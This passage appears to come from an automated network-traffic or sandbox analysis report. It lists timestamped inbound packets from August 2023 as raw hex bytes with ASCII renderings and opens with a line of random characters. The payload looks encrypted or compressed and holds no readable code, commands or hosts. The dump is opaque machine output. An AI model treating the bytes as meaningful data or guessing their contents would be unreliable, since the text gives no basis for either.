HY<>cWdq.2IXV#mM,/gFz_!:f`ZTE"GztV]u-vtLOWy&6H-Ws#slRm64n{1^qy$TlDk[@/?xTwe.Lm;^@rDV#i=m\
2023-08-02 08:35:14 UTC	1089	IN	Data Raw: e2 92 ef f2 82 35 21 f4 f1 da 0f 00 65 b7 d8 8f 06 74 cc b7 28 ae 45 5b c2 9f ae d8 bd 4a c6 26 ec 49 68 9c 51 4f e0 a1 62 54 10 bf 2b 96 f8 39 20 69 f5 1f 47 d1 ca c2 3b 4b 69 9b c8 8e c3 80 21 2e 14 b8 bc 87 70 68 01 d3 ed f9 c0 54 1c df 10 cd 92 0f b2 6c 20 63 72 a4 92 d8 64 b2 5f fa db 33 59 d2 47 3e 03 04 ac 6c ac b5 c1 e3 5e 09 c2 35 f9 d2 22 c6 81 f9 47 45 d6 69 c6 0c 41 4f 9b 16 61 e2 4b ea 1d ab 7c 8b 1c 9d e7 e1 e6 be 88 33 2b 33 4a ed 45 a9 15 42 00 7a f4 74 bf 5d 13 39 17 b8 7b fb 15 42 9a 92 b2 0d 60 97 50 cf 90 8b 0a 18 42 84 ee 76 53 99 8c 45 af e4 55 37 bc c7 2e 71 1b fc 27 03 a5 86 f4 97 b7 61 09 a7 18 12 ca db 17 73 13 b1 0a 37 0a 7d 8c a9 b2 59 2c ef b5 bc 0a a5 5b ca 44 bc 1b 31 14 18 c1 ab c5 e2 03 19 39 b0 ca df 2a 09 7d 07 44 58 bf Data Ascii: 5!et(E[J&IhQObT+9 iG;Ki!.phTl crd_3YG>l^5"GEiAOaK\|3+3JEBzt]9{B`PBvSEU7.q'as7}Y,[D19*}DX
2023-08-02 08:35:15 UTC	1105	IN	Data Raw: 47 ac f2 bb 12 39 2d 18 49 61 84 29 32 d7 76 cc 5c bf 27 12 d3 63 32 8b 86 9b b6 f9 f1 30 77 e3 f9 31 6e 4a 05 31 26 6d 0d 95 41 bd b3 69 88 cb a0 d5 be 9a 71 2b 13 bf 5e 63 8c b4 e2 46 32 c3 17 6d 43 f9 b8 c4 75 a0 42 50 cd c3 a3 51 bc 4b f8 d3 7c 45 07 7a b1 d4 25 77 c2 f3 29 fd 82 a3 82 1d 29 51 bf ba 47 9e 69 85 a8 4a d4 ca 50 41 d0 8a e8 40 a8 d3 68 18 98 1a 61 4e c4 17 cc 8e fd 1b 76 95 00 96 30 03 b5 6d 4d 33 3b aa ac d3 a2 95 ee 38 a5 74 9c 5e 08 50 61 36 6d e0 0f 8c 84 81 ae e3 12 2c 88 d8 69 2c 6f bf 53 d6 32 86 3a 4b 7f 6a 1f 1b ae 30 e5 39 df 6c 68 64 89 b5 b9 df 9e a3 58 63 73 82 84 8f bf 6b 10 09 7a 39 6c 52 d4 02 1b 7f c9 33 84 8b 09 bc 12 21 55 82 13 fd e6 ee 5e 2f 15 c1 9c 8b 78 af 4c e5 e4 c9 35 9d 3a a6 1c 0a 61 3b 42 84 9b 80 89 ae bd Data Ascii: G9-Ia)2v\'c20w1nJ1&mAiq+^cF2mCuBPQK\|Ez%w))QGiJPA@haNv0mM3;8t^Pa6m,i,oS2:Kj09lhdXcskz9lR3!U^/xL5:a;B
2023-08-02 08:35:15 UTC	1121	IN	Data Raw: 4d 08 89 48 02 22 a0 68 15 1b 61 0c 92 7c 4e 15 71 0e 7b da c3 b1 87 c3 64 34 c0 3f 4b 91 1f 6a 4f c5 4e 38 f2 77 06 05 70 4b 82 12 14 a1 55 cf bf 21 79 8c c1 3f e4 6d 56 62 78 83 5f 78 5e 4e d0 2a ed 6c d5 e7 7c 74 1c ae 60 8c 44 50 fb da e7 f9 12 2f 19 b3 23 0f 87 67 f3 42 47 05 aa dd f2 c0 5a 56 87 b1 0a cd 70 f7 ea 55 d2 3a 38 37 87 4d b4 01 91 39 a7 d4 6a 54 18 01 59 5b a3 16 56 15 9a f7 53 ce 75 99 8e 8d 86 ad 50 e5 97 e3 38 63 80 dd fe 18 85 a8 40 42 73 35 ef 67 93 03 82 c4 41 a2 88 59 e6 65 33 24 de 13 67 52 f6 88 e8 98 42 dd 13 7b 42 8b 24 13 f7 65 50 da ec bb c7 59 7b 6f 1c 9f 4f 33 fd 1e a5 ee cc 21 2c fe 04 48 28 7d e4 7e c8 53 fc e2 fc 73 ea cd 86 ca fe e4 7b 6c e0 f3 d4 ea f6 7f f1 88 e7 1f b3 e1 30 de 14 6a 98 df 37 76 88 2e f2 be f4 70 a0 Data Ascii: MH"ha\|Nq{d4?KjON8wpKU!y?mVbx_x^N*l\|t`DP/#gBGZVpU:87M9jTY[VSuP8c@Bs5gAYe3$gRB{B$ePY{oO3!,H(}~Ss{l0j7v.p
2023-08-02 08:35:15 UTC	1137	IN	Data Raw: 31 66 48 92 58 5b 73 60 db 57 94 00 59 b1 6b 32 df f7 ae c1 93 fe c4 27 a2 4f 21 3d 94 94 ec f3 d4 55 ed e6 95 df 8b fa 2d 75 82 42 4f e2 ce 0c 1e 92 b7 e2 db c8 4e 36 e2 58 d2 2b 11 bd fa ac 97 cd 3d aa 07 c9 6a 08 e5 1a eb 88 69 72 35 76 ed db ee ff 40 bd 1d 06 3c 61 e1 ea be 24 fd fc aa 82 43 5c 17 19 57 55 49 e7 09 24 42 f8 ff 22 c0 c3 39 02 52 9a 9a 5a 0e 43 b2 00 d2 9f 46 23 69 ae fb 11 0f dc 07 8d 59 c6 e5 4b 5f 37 3a 99 4c 41 4e f3 4e c5 ae 61 4f 2d 25 15 56 c8 2e cd ff 58 f7 ec 95 f5 ef c6 ed fc 2b ab e6 5d 1a af 83 7e 0b be 97 12 d1 d0 6c db bb ac e0 03 b4 34 5c 73 88 b3 70 5d f4 1a 04 7d 7c dc 55 12 2c a3 25 02 db 05 62 fe 07 ab f2 75 23 d4 04 b3 e0 89 54 d2 13 e8 8b da da f3 a4 1a 91 25 60 8e 39 22 99 d3 57 12 ea 75 64 42 64 cd b2 55 bb 84 65 Data Ascii: 1fHX[s`WYk2'O!=U-uBON6X+=jir5v@<a$C\WUI$B"9RZCF#iYK_7:LANNaO-%V.X+]~l4\sp]}\|U,%bu#T%`9"WudBdUe
2023-08-02 08:35:15 UTC	1153	IN	Data Raw: 91 87 26 13 e0 e7 9e a3 cc 29 8b 02 95 b4 8e 78 de 6c fe ed 58 fe f2 ac e4 0f 92 b4 33 15 ce 7c 61 80 db c7 55 c9 11 de d9 f8 a9 07 5c 61 3d 6e f7 48 7b f4 15 01 20 9f 09 75 6d 48 3e 24 a4 15 09 26 b8 da 2b cd a0 d2 7e 07 3c 5e f3 18 a7 01 80 11 60 99 15 26 dd ae 65 78 29 e8 50 d0 c8 37 e0 72 e8 12 92 9e 43 69 8f 9a 3d 1d 5b 55 fd 5f 78 fb d1 51 09 1d 1b d3 b9 f4 a2 2a cc 4d 53 8c c2 2c 38 1a da 88 e5 e3 a4 35 d2 f9 e9 dc 3a 6c ca fd cd b5 78 51 9b 4a 6a a9 40 0c 17 73 05 33 c7 84 59 3f 6b 33 e4 9a f3 ea e4 6a e7 7a 85 00 41 30 11 b2 7c 9e 44 82 0a 01 d5 ea e9 a1 b8 9d f7 16 22 5e ee 0e f3 ab 5f 17 20 ff 9b 84 42 ff 1c c7 65 23 67 fb 1a b5 41 b9 10 25 78 91 52 f1 08 d5 cf 19 3c 1c c2 e7 14 6f a5 99 9f ea 9d 5b 40 e8 9e c2 80 63 06 db 41 c8 3c d3 38 5a b7 Data Ascii: &)xlX3\|aU\a=nH{ umH>$&+~<^`&ex)P7rCi=[U_xQ*MS,85:lxQJj@s3Y?k3jzA0\|D"^_ Be#gA%xR<o[@cA<8Z
2023-08-02 08:35:15 UTC	1169	IN	Data Raw: 1f 08 82 41 d2 ba 47 94 18 9d 84 1b 5c 33 c4 79 5d 44 66 a7 e1 1a cc 25 df a2 54 2e 68 c7 2c 22 a2 9c 2e b5 6f af 98 4b 0f 63 3c ef b8 68 43 d5 dd cf cc 32 c2 38 86 e7 46 22 83 28 07 38 ef e1 fb ef 6d 4b 91 ab 7c 6a 27 f0 40 c4 23 d4 b6 29 ee 2c f8 a3 8e ce bd f8 6f b8 44 ab 22 8b 95 58 44 f8 6a 31 7d d5 be 3a d0 6c ea 53 04 e4 0f 24 92 a6 d4 96 a5 1f 82 b5 29 71 fb a7 95 56 7c 1d 4e cb 14 74 c7 fa 6f 12 d8 af 84 52 ab 8b 5d 8c f5 10 9e f5 23 ac 73 fd 97 e1 25 f4 c1 d6 d0 a0 04 49 3c 42 8e e6 09 d3 f8 57 e4 f7 7e 8d 7a f9 8f e9 b9 c6 4d 36 82 19 0a 32 83 02 c9 41 5d a2 0b 21 a6 ed 1d be 30 be ba f7 7b 88 e8 d5 db 08 81 d9 10 e6 71 a6 91 1d f6 74 f3 58 e8 cc ff b1 a5 f3 f3 7b df f2 54 c7 8b 62 38 b9 0e a1 d7 55 8d aa 38 2a 70 d8 2c aa 46 e4 e6 64 83 e2 6b Data Ascii: AG\3y]Df%T.h,".oKc<hC28F"(8mK\|j'@#),oD"XDj1}:lS$)qV\|NtoR]#s%I<BW~zM62A]!0{qtX{Tb8U8*p,Fdk
2023-08-02 08:35:15 UTC	1185	IN	Data Raw: c5 a0 7a f0 41 2b aa ad df 6e c5 68 76 ea 41 30 a2 8d c9 4e 6f 68 cb 74 38 c0 7a 49 ed 2e c9 ec b7 10 4a 0a 7a 65 32 d8 be c3 03 24 42 27 5b 1d 0b d9 42 38 78 f1 85 a3 b4 45 1c 98 50 42 8a 2f 7e 85 b9 3c 46 2b 7e ee f6 3b 01 67 a7 19 43 20 53 2b bc 5d 16 52 61 0e 34 c5 22 06 d8 05 3e 7f ba 0d ec 4f 5a 92 48 7a a6 8d 59 2e eb 32 a8 bb 3e 7b ac 40 7d 45 85 e1 77 f2 f5 b1 a8 cf c6 4a 8a a1 8d d4 e2 75 7b 09 83 e5 e1 bb 2a 4e 32 ef b9 c3 b8 0b 21 86 e2 e0 05 35 e9 df 2a 21 0f 36 1f 05 c3 c8 a3 47 56 f0 2e 67 fc 54 82 7f f4 62 6b de 85 18 ce 00 98 21 76 ab 36 4a 72 54 f9 f1 fb 44 db 46 31 47 fd 2c f7 e0 e4 1f de ee 83 8d bb 68 c9 12 f5 19 83 d1 59 51 b3 39 35 02 49 dc a5 98 bd 43 4b 6e a5 90 b9 fe 9e 73 39 f8 1a ba e0 c9 fe 4f dc 91 b7 6b 96 0d 66 7a b8 ca 24 Data Ascii: zA+nhvA0Noht8zI.Jze2$B'[B8xEPB/~<F+~;gC S+]Ra4">OZHzY.2>{@}EwJu{N2!5!6GV.gTbk!v6JrTDF1G,hYQ95ICKns9Okfz$
2023-08-02 08:35:15 UTC	1201	IN	Data Raw: 83 d4 16 ac 61 73 95 ef 1d 1c b1 93 90 79 2a 21 7c e6 da f2 af ca 36 93 7a 0d 45 4b 01 4a 7e 8e bc 39 18 b6 7c df 61 a0 bf 5e f6 6e e2 c2 db a4 a1 da ec 19 fe b5 c1 0a 2a b3 82 8f 28 72 ed 7b 80 1e 3c 49 82 f8 fb 7f 3e 18 9c aa c9 cc 1e 64 a4 55 85 8b 30 c5 53 72 f2 0d 73 1f 52 be 5c cc e2 bf c8 b4 47 5d 20 1c 0e f7 2e a2 e3 1d 53 55 ae ca 90 0a a7 67 be 61 ac 70 b6 6e 5f 79 de a6 24 e9 8a 62 02 9d 3e 2b 1e b2 f3 5e ad 98 24 42 d4 19 76 7d 68 dc b1 a1 57 13 c6 e7 db 31 ce 4d 4b ed 43 73 0d 5e 62 01 5d c5 15 d1 38 65 b4 da 7c 4c 8e 37 6a 1d 6b dc 1a 6f ca d3 e9 07 10 39 f0 10 fc 20 de 4a 93 c3 9d ef 27 8b 65 32 1b 7e 3b 94 42 ff 36 42 ad 5d 39 8f 04 55 f5 b3 a9 08 16 ae 08 89 17 2b cc 1d af c8 69 30 ec f3 5b 15 35 8b 91 14 8e 87 a7 01 f9 6f 92 3b bb 7b 75 Data Ascii: asy!\|6zEKJ~9\|a^n(r{<I>dU0SrsR\G] .SUgapn_y$b>+^$Bv}hW1MKCs^b]8e\|L7jko9 J'e2~;B6B]9U+i0[5o;{u
2023-08-02 08:35:15 UTC	1217	IN	Data Raw: 54 26 ad e7 4c a8 f0 38 ac c9 6b b5 4b 7b 92 d0 6f 3b 4f 14 0b fa 1e b9 49 3b e4 eb 70 d5 0e 69 e6 65 db 8c f4 af d1 a3 f1 50 41 a2 40 85 fa 1d 2d 6c d1 8a d2 0e 6b 02 79 fc 6a ef 26 6f 2a ab c1 29 ae 77 95 6d 16 a4 0c d0 38 10 b1 f8 59 9f d9 5b cd bd c7 2f e7 f0 1d 15 70 8a 0c 84 84 78 02 20 cd 8a ad 56 0e 0d 38 b9 59 9f df b2 af 67 53 5a 71 b8 4a df a4 2f 08 32 a4 8a 53 1a 09 7a 34 a1 17 0f 39 d6 83 38 08 fd 9d 9a f4 f9 e0 e1 3e 63 3d ba 6a 6b a5 b1 cb 5f 7a c4 1a 99 f6 e6 15 e1 0c 58 72 7b 65 74 38 71 d2 b5 10 e1 15 4b 12 49 8b b7 31 35 68 29 92 44 bb ab 35 54 75 f3 a0 00 b7 7b 51 27 d6 83 21 a6 66 ac 49 c2 e1 49 5d 1a 05 7c 13 1a 37 7b be 9b 80 f6 43 21 4f 8c a8 fc 2f f1 42 7b 2e f2 c8 de 17 b9 90 6b 9c 0c 30 44 43 69 6e c7 26 04 aa 23 17 f3 d5 5b 02 Data Ascii: T&L8kK{o;OI;piePA@-lkyj&o*)wm8Y[/px V8YgSZqJ/2Sz498>c=jk_zXr{et8qKI15h)D5Tu{Q'!fII]\|7{C!O/B{.k0DCin&#[
2023-08-02 08:35:15 UTC	1233	IN	Data Raw: 34 96 90 5b bf 43 de 35 57 69 a4 ac 51 68 4a 41 78 61 c9 cb 41 7f 7d 9e 46 29 02 09 fb d2 03 5e 38 b4 e5 5e 8d 97 c7 98 a1 95 a9 40 78 c7 13 dd cc 8f 87 84 df 33 73 84 36 09 2b 67 e1 0e e7 df 0e a0 4a b4 8f 09 26 12 7d 84 dc 70 e9 21 51 2d 74 e1 33 36 ff ab 48 7b 92 ca e2 ba 66 ea 10 9d 99 26 cd 44 b8 ac 76 7c 9e 03 8f b2 bb 57 e3 08 3a 1d 44 67 ff 34 90 b2 57 4d 16 ca bb 9f 6f ad e7 24 02 a4 2f 59 77 26 60 2c d0 3f f3 d2 76 f1 44 b7 20 19 db f7 93 31 c2 af b8 54 44 a8 9e 43 b4 df 86 93 38 85 6c 2c 0a 31 64 af ef 91 7e 6b f3 89 0c 42 d0 6b 71 70 b3 ab 76 18 82 c2 e0 ee 8b 12 4f 24 95 4f 9d 4d f3 03 76 64 e5 a5 73 ad 9d 02 0c dc 9a 90 9b 1c cf 35 d5 25 91 26 e1 8e 6c 7a 1b de 89 c4 b2 a2 89 17 b7 df 84 4e e6 a4 d8 3f 6b d2 5c c7 dd 11 d3 dd 27 6a 2d 63 af Data Ascii: 4[C5WiQhJAxaA}F)^8^@x3s6+gJ&}p!Q-t36H{f&Dv\|W:Dg4WMo$/Yw&`,?vD 1TDC8l,1d~kBkqpvO$OMvds5%&lzN?k\'j-c
2023-08-02 08:35:15 UTC	1249	IN	Data Raw: 2f 18 82 34 6a ee 1b 16 cc 26 8d a9 d9 99 00 d0 65 e2 43 97 da 4c dd d2 a2 d3 6f 79 cb 70 9b 24 ff 37 8b 2b 05 bd ea 93 59 6a ae a7 be 27 99 b5 02 cd 93 25 6e d0 ca 6c 3e 70 f5 98 f5 f9 7a bd 06 bf 9e da f6 21 d5 84 d5 32 f9 c3 38 6b 4e 53 0e c7 56 6f f6 4a 5c 57 88 c9 d3 37 b9 b7 72 7d 65 3f bc 07 49 04 1d 1a d3 0c a8 25 1c f3 9d cc a3 a4 7d 28 d1 31 90 20 a5 93 16 36 b8 2e 6c f3 37 19 69 54 36 a0 f5 4b 83 c8 45 3b 5b db bb cb 21 9c 1c 0b 66 d1 2f a0 b6 5f 78 94 3a 5e 8f f2 bf 4a 2a 42 12 41 a2 fb 41 c2 65 89 fa 9b 69 af 4f 65 e8 1e be dc aa b5 60 f0 2c 1d 36 58 3d f0 d4 ec b0 89 7a 1c 9c ee 60 3b c7 82 20 66 0c a0 0b 3a 48 f5 24 22 b9 07 6b 23 bc 68 73 c1 f2 35 2c b5 3e c4 b1 ae e5 e5 b7 41 36 97 a9 d5 89 ab ed 7d da 3f f4 9c f3 9a 92 ab 64 33 ff 36 a2 Data Ascii: /4j&eCLoyp$7+Yj'%nl>pz!28kNSVoJ\W7r}e?I%}(1 6.l7iT6KE;[!f/_x:^J*BAAeiOe`,6X=z`; f:H$"k#hs5,>A6}?d36
2023-08-02 08:35:15 UTC	1265	IN	Data Raw: 02 1a 3e dd ef c6 b1 d0 4f b9 8b a9 bc e1 ba 60 e1 76 da 29 e1 65 a7 ba a5 04 e7 e0 fc 1f d8 35 13 81 a3 23 55 19 c7 40 1b 27 b6 b0 4e 60 9f 18 5e d5 fa 34 d2 c9 20 cd ab dc 30 fc 35 76 8c d4 60 c3 00 c4 f0 5b 2b 98 4b 9a c9 53 7c d9 5b bb 02 e4 15 d9 3a 90 ac 31 a6 50 da 88 be fe 53 5a 78 f9 5b 2a 4d eb a5 34 16 09 cf bc ff 8f f3 9c 19 09 45 68 c3 92 fb fb a7 0b 1c e9 5c 08 9a 2d 07 1d e0 d8 b2 01 75 b8 58 1b 27 ef 20 27 37 59 8d e5 a2 d3 0b ca 75 d0 39 89 67 d2 aa 3d 16 aa 56 4c 17 73 1a 6c 6a 4e 4b 75 8b b9 25 50 fd 87 2d 10 ee 1b f0 54 81 fc 59 f4 56 c3 70 20 1c 7b 30 2a 6d d0 bf 9b 45 70 a6 ae ac 0b bb 84 91 09 38 5f 5c 8c 4f 68 f1 3c 90 1e 09 fe 77 4e 8c 13 12 c6 23 24 be 73 89 7b cf 8b 00 03 78 b5 11 09 79 37 52 72 8c 8a f3 8c dc 15 df 19 11 2a 21 Data Ascii: >O`v)e5#U@'N`^4 05v`[+KS\|[:1PSZx[M4Eh\-uX' '7Yu9g=VLsljNKu%P-TYVp {0mEp8_\Oh<wN#$s{xy7Rr*!
2023-08-02 08:35:15 UTC	1281	IN	Data Raw: 1b 57 6a a1 05 d8 0b 10 73 43 d8 ef 4e b0 c4 e0 30 7f 4c 0f 6c 4e 02 b8 b4 01 ef 60 3c 79 ed e8 87 75 9a 40 dc 9f dc 8f 7b 32 d5 13 be aa e4 fa f7 7c 85 a0 12 ce aa 55 0c 87 ce 14 08 0a b3 26 4f 27 14 e7 7e f4 0b 1f 85 de bb dd c3 e9 19 28 49 4e 67 da 16 85 9f e9 1c 84 9b a0 5e dc c3 6a 94 28 a6 0f 56 b1 5b c7 aa bc a1 01 e1 e8 13 44 82 25 ae cf 73 2d 98 9d ba 5e 5e 67 14 72 0c d9 18 98 0a 10 ca 65 2f 4a c0 43 4d 84 21 d0 cf 3e f3 04 d8 ee 38 f5 fc ee fd 01 2c f8 af 74 3f 24 1a 3c 77 48 b3 f8 58 2f 77 a2 a2 db 2c 23 32 66 39 f2 e9 82 c6 2f b5 2c 6f 42 8b 58 15 72 b7 32 cb c7 3a 5b eb 20 3f be 3c b9 5a 9c 33 ba 1c 7a e0 5c 13 90 67 16 14 d3 8d df 3d 96 cd bf 92 45 f6 3f 0a 6c 04 92 e5 fd f6 31 fd 9f b0 21 ac 70 4a 0d 8c 42 57 12 53 52 93 df b5 cd ef cd a5 Data Ascii: WjsCN0LlN`<yu@{2\|U&O'~(INg^j(V[D%s-^^gre/JCM!>8,t?$<wHX/w,#2f9/,oBXr2:[ ?<Z3z\g=E?l1!pJBWSR
2023-08-02 08:35:15 UTC	1297	IN	Data Raw: 29 21 8f f8 d9 8b 74 9b 16 f4 c1 ba ee 84 1e 5f 86 b4 95 9e a1 b2 ba f8 6e 9e 22 70 d9 1e 9e a6 74 0a 2b a7 d0 5d d6 f7 c8 92 2a 42 46 6b a0 e1 d0 d9 ee 06 76 92 32 d4 ff 5d 5f 49 0c f6 34 85 cf d8 fa 9c 72 21 ef a6 b2 24 4a bd cd 1c 7b 65 8f 22 3a 37 6e 46 6b ed 77 c9 ef 89 ab e0 be c8 7a b7 54 9c fb 5a 2f 17 81 09 b4 78 b6 25 e2 e9 3b 04 5a 8b cd 65 92 b6 8b a7 05 11 11 0e 56 20 b4 4f 03 bd 3d 89 f9 ea 13 9b cf 8d 45 80 a9 e2 fc 39 b7 35 0d b0 f5 c8 32 5a 31 33 9f fd 83 b0 3b 88 6a 3b bf 5e 50 52 c0 18 36 e7 f8 3c ff 31 1d 9c eb 44 a2 68 39 9b 69 64 b6 05 ad d7 0c 3c 48 15 1e fe 37 8b e8 54 3a 7b 15 53 6d 38 b6 b7 bb 9a 8e 0a 1e 41 6a 40 94 68 05 a6 e8 11 75 09 38 6b cc ea 57 7e 5a c2 86 06 aa 87 70 86 a9 90 1b 0b bf f3 a3 4e 14 73 01 68 88 06 9f db 87 Data Ascii: )!t_n"pt+]*BFkv2]_I4r!$J{e":7nFkwzTZ/x%;ZeV O=E952Z13;j;^PR6<1Dh9id<H7T:{Sm8Aj@hu8kW~ZpNsh
2023-08-02 08:35:15 UTC	1313	IN	Data Raw: 67 b9 4a ee fd 4b 0b 9b 02 75 cb b8 45 96 af 43 07 d4 24 ef 1d ac 8c 35 9e 11 3b 18 83 33 8b a7 c0 8b c2 d1 80 b9 f4 2d 3e b8 79 63 11 18 8a 8d 88 ff cf b4 a2 f4 b0 50 b5 cd 5c d9 a1 ef 03 34 6b 7d 68 6c 83 97 14 f5 de c0 40 79 3f 8e 49 07 76 54 94 79 ef 83 94 10 74 09 60 64 0c d6 21 01 f0 64 47 26 fe 0a b1 6e 7d d6 2f 09 0b d3 7e 06 1b 30 3b 17 a2 ce 62 1e a0 2b dc 2c 5e 3a 23 4b f2 a1 c2 e1 29 5d 6c bc 5e 7b df 78 ac b0 b7 15 9a 90 56 ef d9 6b ef 75 d8 0b b9 71 d3 57 e5 9c 4f 30 81 ea c2 44 09 0d c3 ba 92 a2 71 cc e5 d5 73 3c c6 25 bd 21 7b e7 7f 6a ce 25 91 56 90 7b f1 5a e3 a0 bf 2a 25 f5 0a c4 32 e2 39 d3 84 63 12 20 a4 8c 29 af 1d c7 6f 5d 95 63 65 1a 1d 88 f7 9e 92 c6 f0 97 90 60 26 08 6c 30 c4 b6 67 08 62 c4 af 09 61 da 34 d0 f5 8a c4 3d 91 8a 02 Data Ascii: gJKuEC$5;3->ycP\4k}hl@y?IvTyt`d!dG&n}/~0;b+,^:#K)]l^{xVkuqWO0Dqs<%!{j%V{Z*%29c )o]ce`&l0gba4=
2023-08-02 08:35:15 UTC	1329	IN	Data Raw: 45 20 81 c4 eb 32 f3 e0 2c c2 ff 13 05 0b 89 3b 75 0c 92 53 d7 76 b1 ce 43 49 8e 5f 81 a2 19 77 ea 31 d9 5d 6c 62 8e f6 af 7d f3 ef c5 51 fa 09 a1 ad ef 82 38 25 52 c8 4c 03 fd 35 63 3a aa 21 1f 29 6b a1 28 88 c9 e6 64 f1 01 04 94 6f 7d 2f a6 cc cd 4a 00 c2 34 79 b2 4e c3 a9 0f 86 c8 c5 38 b0 65 9c dc d7 fe 5a ce ae 88 d5 72 29 7b 27 c0 55 94 e8 ed 30 b2 e1 dd ac 5f 4f da d9 d1 e4 59 49 f9 fb 4e 9c 2a f7 9e a9 47 c5 e9 8c c8 ca 35 b4 16 09 c5 0e c8 2a 88 d6 39 e5 12 ef 0d 84 b7 b0 25 f7 24 f2 7d f2 8d 2e ca 2d d5 4e ff 00 60 cb 76 f5 3e a4 f2 c1 d4 ca 7c cb 55 65 d3 e8 bb b1 0c 7f 2b b7 18 b6 71 c8 82 e8 43 78 2f 90 75 36 19 df 24 1f 93 50 1e 3b 9b 77 f9 c3 e2 06 61 ac 0c 2c a3 de 8f d2 ce 39 6b 40 b9 1d 9c 21 6c 9d 09 e6 bf 1e ed 24 50 83 45 f9 47 ae d3 Data Ascii: E 2,;uSvCI_w1]lb}Q8%RL5c:!)k(do}/J4yN8eZr){'U0_OYING59%$}.-N`v>\|Ue+qCx/u6$P;wa,9k@!l$PEG
2023-08-02 08:35:15 UTC	1345	IN	Data Raw: 55 10 bb 4b 21 88 66 57 8b 71 52 f4 b0 fc c3 ab 41 e2 fd 64 d7 31 85 42 2b 9b 56 dd fd ac 06 c8 55 9b 05 09 03 5a 24 c4 2e be 2d 85 12 97 8e d9 64 a7 12 af f8 be 93 ef 54 fa f3 a2 7d f6 18 1a 0c 5b c0 bc d7 98 06 5b 37 b1 c8 cb 7e df 18 82 8f 81 e6 33 75 64 23 f1 c3 d6 6e 56 cb aa 03 a7 99 0c f0 af 15 43 08 be b5 a2 57 0d be 40 52 96 c3 26 54 9f 7c 85 ad eb 35 3c dd 55 f7 ff 7d 55 a6 01 15 47 a0 e1 9b 4b d7 3d f5 37 76 13 83 63 9b 79 30 cc d6 f2 fd aa 3b c3 15 86 a9 67 6e 1a bf d4 0c fb d1 67 c1 79 6f 5a e8 32 12 e9 6e 2d 3c c0 e7 a9 9e 7c 7d 39 f5 f6 aa 89 ea 46 50 aa cc 26 c1 00 2e 33 be ba 88 ff f2 30 24 4d f9 71 66 05 03 8f 74 55 80 e5 ea f9 d6 23 96 2f 29 e6 37 89 bb 9c de 69 8b 2c a6 02 6b 26 c0 2c 61 9c 7f 69 d5 97 61 91 98 1b 1e 12 1b cf 6c 44 1c Data Ascii: UK!fWqRAd1B+VUZ$.-dT}[[7~3ud#nVCW@R&T\|5<U}UGK=7vcy0;gngyoZ2n-<\|}9FP&.30$MqftU#/)7i,k&,aialD
2023-08-02 08:35:15 UTC	1361	IN	Data Raw: 17 c5 98 98 c4 b2 52 79 c0 5b ca e0 f0 b9 97 d7 be 1b 78 72 9c 48 e1 cc 0c b7 87 b0 c4 52 b3 6e 7c 0d 61 f2 75 8b ff 06 39 51 6b dd d7 c6 bc 5c 7c 24 0f 41 71 5e b7 c9 a9 76 0e 8c 46 55 f8 21 e9 3e fd b3 64 d5 71 eb 7a 3f e8 29 a7 1b b3 00 7e b8 8a 4d 0b 39 f7 93 1c 6f 4a 92 30 12 e9 52 f1 b1 0e a7 8d 1b 86 cf b2 6c b1 ba f3 8a 99 e8 78 20 c5 e7 ec 61 14 c7 ba 67 2b c9 fa 1a a0 f5 ce b5 f1 bc e6 5a dd 48 67 f6 29 66 46 07 4c bf 71 0a e1 ac 77 46 ca 74 70 5d f6 3c 3e a1 c9 5b 4d 2d bd ed 94 42 41 35 21 aa f4 b1 ca 66 f8 b3 c6 47 85 6a b1 04 e3 07 ed cf 52 6a 8d 08 16 62 02 73 cb e1 43 f0 ed 32 ca 14 16 ee 97 91 2b a4 c6 b2 aa 48 bf ef cf 52 c7 ab 11 fd 26 15 d2 aa f2 38 ff 16 4b bb c0 f2 be 50 3a ba 71 20 dd c3 23 97 74 13 ac d1 b6 d6 bc 78 98 07 12 cd 10 Data Ascii: Ry[xrHRn\|au9Qk\\|$Aq^vFU!>dqz?)~M9oJ0Rlx ag+ZHg)fFLqwFtp]<>[M-BA5!fGjRjbsC2+HR&8KP:q #tx
2023-08-02 08:35:15 UTC	1377	IN	Data Raw: 8d 71 dc c2 dd 74 f6 15 b0 f8 0b e5 c1 3b c0 80 3b 0c 50 56 f5 d0 89 19 1e eb 12 27 0e 42 1f 47 08 b0 5e ab c1 c4 cd 0a d0 ea c0 e6 9e 91 8c e6 b9 9a e2 5b 3f cc 8d b8 63 fb 64 e8 81 af 7e 94 fd aa 13 e9 70 0d 18 c0 55 2f 41 0c 76 fa 60 21 ce 73 b5 b8 bd 76 f8 d5 1d 69 f7 29 e7 14 4f 2f d1 44 dc cd 41 91 86 93 9b b0 a8 bf 99 9f 09 4c a7 17 83 b6 03 03 f4 0b 7e 50 44 1b bd 13 4f d8 38 f7 6a 23 4d 5a 3b 4e d9 07 0b 12 e8 05 60 47 c3 c7 98 ed dc 26 fd 42 db 9b bb 48 a6 02 4e 76 72 23 96 6a f6 6a 42 e7 5d 01 cc f6 37 9b 37 26 16 a9 3b 8c ef 49 3b d6 20 9f de 41 c3 95 e7 61 93 7c ce 1f 29 15 1b b9 ff 9d 6f ef 81 d3 de 69 a6 20 2f d5 7b c3 bc 4a f1 48 f3 df 90 e8 56 b2 9d de 5e 3d 95 c2 96 44 56 8d e2 f4 85 6f 61 69 4d 11 54 43 b1 29 8c 99 cf 46 16 5c e6 2b 57 Data Ascii: qt;;PV'BG^[?cd~pU/Av`!svi)O/DAL~PDO8j#MZ;N`G&BHNvr#jjB]77&;I; Aa\|)oi /{JHV^=DVoaiMTC)F\+W
2023-08-02 08:35:15 UTC	1393	IN	Data Raw: f5 67 ba ad fc 75 91 a4 6e e1 a3 39 d6 e0 9e fd 28 1d 56 98 e1 4b 03 9b 6b b4 ae 54 77 1f 54 58 f5 07 c0 eb eb 9e 05 ed 51 51 de 61 f3 e2 67 10 9b 9c 84 84 50 c1 11 99 20 2d bb f4 cf cf fb f1 87 13 09 52 8b b3 d8 b3 b4 19 72 4e f9 6b 2e b4 f5 88 c2 54 59 01 b3 b7 1e 26 91 83 a7 d6 8b 8c f2 c8 1d 70 15 8e 8e d7 b7 0c 81 40 e9 2b 5c 0b 40 02 81 0b 74 46 28 c2 f8 66 a9 7c 3f 03 a4 77 70 7e a1 88 49 98 51 8f 2e 00 e9 51 64 22 06 43 0a 68 c1 6c 85 34 a6 fa 5f c7 9e bf 71 57 8d 0b d5 bd 3f 28 cf a0 3c 34 21 7e ca c5 5f 93 e2 4c ae 55 db 99 85 ee dd 4b 92 6f a9 86 fc a4 83 b1 9a dc a6 89 00 6d 1c 4a ff a7 f0 64 ff 17 f7 93 4a 85 85 14 3f 5f 16 3c ea 60 6d 